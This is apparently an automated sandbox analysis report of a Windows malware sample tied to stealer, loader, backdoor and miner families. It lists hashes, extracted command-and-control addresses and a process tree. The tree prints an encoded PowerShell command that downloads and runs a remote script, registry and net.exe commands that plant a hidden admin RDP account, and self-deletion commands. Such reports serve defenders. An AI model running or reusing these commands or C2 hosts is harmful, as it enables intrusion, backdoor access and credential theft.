Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    12-10-2021 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe

  • Size

    175KB

  • MD5

    9119ad58173dcd759a3e0590b730340a

  • SHA1

    072bcb565930ae49628a1e2b604435a0d8f43776

  • SHA256

    b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275

  • SHA512

    4a0fb45fe78b268cff152a59fff0507c52810bed97cb6e3f6089071c8d6dd960a9e06d3c46212660223c742b927c4a671764c36b83d31f5607f40308a20a1795

Score
10/10
raccoonredlineservhelpersmokeloadervidarxmrig103315927d80aa27e80cd2ef63c638e2752e24242d1b37c8d179b9e611eee525425544ee8c6d77360ab7cd9fbe5e97e7d069407605ee9138022aa82166657e6w1backdoorcollectiondiscoveryinfostealerminerpersistencespywarestealertrojanupxvmprotect

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.3

Botnet

1033

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    1033

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes
  • url4cnc

    http://teletop.top/agrybirdsgamerept

    http://teleta.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

159

C2

190.2.136.29:3279

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Vidar Stealer 2 IoCs
    stealer
  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe
    "C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe
      "C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2004
  • C:\Users\Admin\AppData\Local\Temp\4DE.exe
    C:\Users\Admin\AppData\Local\Temp\4DE.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Accesses Microsoft Outlook accounts
    • Accesses Microsoft Outlook profiles
    • outlook_office_path
    • outlook_win_path
    PID:2212
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4DE.exe"
      2⤵
        PID:1908
        • C:\Windows\SysWOW64\timeout.exe
          timeout /T 10 /NOBREAK
          3⤵
          • Delays execution with timeout.exe
          PID:400
    • C:\Users\Admin\AppData\Local\Temp\9A2.exe
      C:\Users\Admin\AppData\Local\Temp\9A2.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious use of WriteProcessMemory
      PID:752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im 9A2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A2.exe" & del C:\ProgramData\*.dll & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:904
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im 9A2.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:2616
    • C:\Users\Admin\AppData\Local\Temp\1470.exe
      C:\Users\Admin\AppData\Local\Temp\1470.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1760
    • C:\Users\Admin\AppData\Local\Temp\1EA3.exe
      C:\Users\Admin\AppData\Local\Temp\1EA3.exe
      1⤵
      • Executes dropped EXE
      PID:2868
    • C:\Users\Admin\AppData\Local\Temp\2DC7.exe
      C:\Users\Admin\AppData\Local\Temp\2DC7.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        2⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nv5bspkd\nv5bspkd.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1864
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57F0.tmp" "c:\Users\Admin\AppData\Local\Temp\nv5bspkd\CSCF538AC0CDBF458D8CEC8EBF98271678.TMP"
            4⤵
              PID:1976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3232
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            3⤵
              PID:2472
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
              3⤵
                PID:2496
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                3⤵
                • Modifies registry key
                PID:3344
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                3⤵
                  PID:948
                • C:\Windows\system32\net.exe
                  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  3⤵
                    PID:3860
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                      4⤵
                        PID:400
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                      3⤵
                        PID:2196
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start rdpdr
                          4⤵
                            PID:3640
                            • C:\Windows\system32\net.exe
                              net start rdpdr
                              5⤵
                                PID:1684
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start rdpdr
                                  6⤵
                                    PID:1544
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                              3⤵
                                PID:3188
                                • C:\Windows\system32\cmd.exe
                                  cmd /c net start TermService
                                  4⤵
                                    PID:3840
                                    • C:\Windows\system32\net.exe
                                      net start TermService
                                      5⤵
                                        PID:2496
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 start TermService
                                          6⤵
                                            PID:1360
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                      3⤵
                                        PID:4012
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                        3⤵
                                          PID:3672
                                    • C:\Users\Admin\AppData\Local\Temp\34BD.exe
                                      C:\Users\Admin\AppData\Local\Temp\34BD.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:2496
                                    • C:\Users\Admin\AppData\Local\Temp\3C4F.exe
                                      C:\Users\Admin\AppData\Local\Temp\3C4F.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3272
                                    • C:\Users\Admin\AppData\Local\Temp\4D87.exe
                                      C:\Users\Admin\AppData\Local\Temp\4D87.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:3220
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                        2⤵
                                        • Drops file in System32 directory
                                        • Drops file in Windows directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2376
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dmnamj5s\dmnamj5s.cmdline"
                                          3⤵
                                            PID:1504
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CAC.tmp" "c:\Users\Admin\AppData\Local\Temp\dmnamj5s\CSCBD4AED7D31DC4373B38027E99BE0369C.TMP"
                                              4⤵
                                                PID:4008
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                              3⤵
                                                PID:2896
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                3⤵
                                                  PID:2332
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                  3⤵
                                                    PID:2896
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                    3⤵
                                                      PID:3660
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                      3⤵
                                                      • Modifies registry key
                                                      PID:1152
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                      3⤵
                                                        PID:3188
                                                      • C:\Windows\SysWOW64\net.exe
                                                        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                        3⤵
                                                          PID:948
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                            4⤵
                                                              PID:3548
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                            3⤵
                                                              PID:3636
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c net start rdpdr
                                                                4⤵
                                                                  PID:3932
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net start rdpdr
                                                                    5⤵
                                                                      PID:1980
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 start rdpdr
                                                                        6⤵
                                                                          PID:2016
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                    3⤵
                                                                      PID:1464
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c net start TermService
                                                                        4⤵
                                                                          PID:1152
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net start TermService
                                                                            5⤵
                                                                              PID:4008
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 start TermService
                                                                                6⤵
                                                                                  PID:3936
                                                                      • C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1604
                                                                        • C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:1208
                                                                        • C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\53F0.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:2412
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                        1⤵
                                                                          PID:3672
                                                                          • C:\Windows\system32\net.exe
                                                                            net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                            2⤵
                                                                              PID:3936
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                3⤵
                                                                                  PID:2892
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd /C net.exe user WgaUtilAcc zg7dc2e5 /add
                                                                              1⤵
                                                                                PID:4088
                                                                                • C:\Windows\system32\net.exe
                                                                                  net.exe user WgaUtilAcc zg7dc2e5 /add
                                                                                  2⤵
                                                                                    PID:1140
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user WgaUtilAcc zg7dc2e5 /add
                                                                                      3⤵
                                                                                        PID:1208
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                    1⤵
                                                                                      PID:2008
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                        2⤵
                                                                                          PID:3952
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                            3⤵
                                                                                              PID:400
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                          1⤵
                                                                                            PID:2240
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                              2⤵
                                                                                                PID:3496
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                  3⤵
                                                                                                    PID:4020
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                1⤵
                                                                                                  PID:3216
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                    2⤵
                                                                                                      PID:3944
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                        3⤵
                                                                                                          PID:1320
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      cmd /C net.exe user WgaUtilAcc zg7dc2e5
                                                                                                      1⤵
                                                                                                        PID:1604
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net.exe user WgaUtilAcc zg7dc2e5
                                                                                                          2⤵
                                                                                                            PID:1384
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 user WgaUtilAcc zg7dc2e5
                                                                                                              3⤵
                                                                                                                PID:1860
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd.exe /C wmic path win32_VideoController get name
                                                                                                            1⤵
                                                                                                              PID:1896
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic path win32_VideoController get name
                                                                                                                2⤵
                                                                                                                  PID:4020
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                cmd.exe /C wmic CPU get NAME
                                                                                                                1⤵
                                                                                                                  PID:1604
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic CPU get NAME
                                                                                                                    2⤵
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:1908
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                  1⤵
                                                                                                                    PID:740
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                      2⤵
                                                                                                                        PID:4012
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                          3⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:3060

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • memory/752-127-0x0000000001A36000-0x0000000001AB3000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      500KB

                                                                                                                      Download

                                                                                                                    • memory/752-130-0x00000000034A0000-0x0000000003576000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      856KB

                                                                                                                      Download

                                                                                                                    • memory/752-131-0x0000000000400000-0x0000000001735000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      19.2MB

                                                                                                                      Download

                                                                                                                    • memory/1400-292-0x00000266BF486000-0x00000266BF488000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1400-288-0x00000266BF483000-0x00000266BF485000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1400-287-0x00000266BF480000-0x00000266BF482000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/1604-231-0x00000000056D0000-0x00000000056D1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1604-233-0x00000000051C0000-0x00000000051C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1604-223-0x0000000000840000-0x0000000000841000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1604-225-0x0000000002B40000-0x0000000002B41000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1604-227-0x0000000001160000-0x0000000001161000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-154-0x0000000000140000-0x0000000000162000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                      Download

                                                                                                                    • memory/1760-170-0x00000000049C0000-0x00000000049C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-177-0x0000000004830000-0x0000000004E36000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.0MB

                                                                                                                      Download

                                                                                                                    • memory/1760-179-0x0000000004930000-0x0000000004931000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-174-0x00000000048F0000-0x00000000048F1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-169-0x0000000004890000-0x0000000004891000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-165-0x0000000004E40000-0x0000000004E41000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1760-162-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/1776-116-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      Download

                                                                                                                    • memory/2004-117-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      36KB

                                                                                                                      Download

                                                                                                                    • memory/2212-123-0x0000000001886000-0x00000000018D5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      316KB

                                                                                                                      Download

                                                                                                                    • memory/2212-128-0x0000000003330000-0x00000000033BE000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      568KB

                                                                                                                      Download

                                                                                                                    • memory/2212-129-0x0000000000400000-0x0000000001708000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      19.0MB

                                                                                                                      Download

                                                                                                                    • memory/2216-205-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-249-0x000001922EDC0000-0x000001922EDC1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2216-209-0x000001922E630000-0x000001922E631000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2216-208-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-232-0x00000192147B6000-0x00000192147B8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-211-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/2216-259-0x00000192147B8000-0x00000192147B9000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/2216-210-0x0000019214730000-0x0000019214732000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

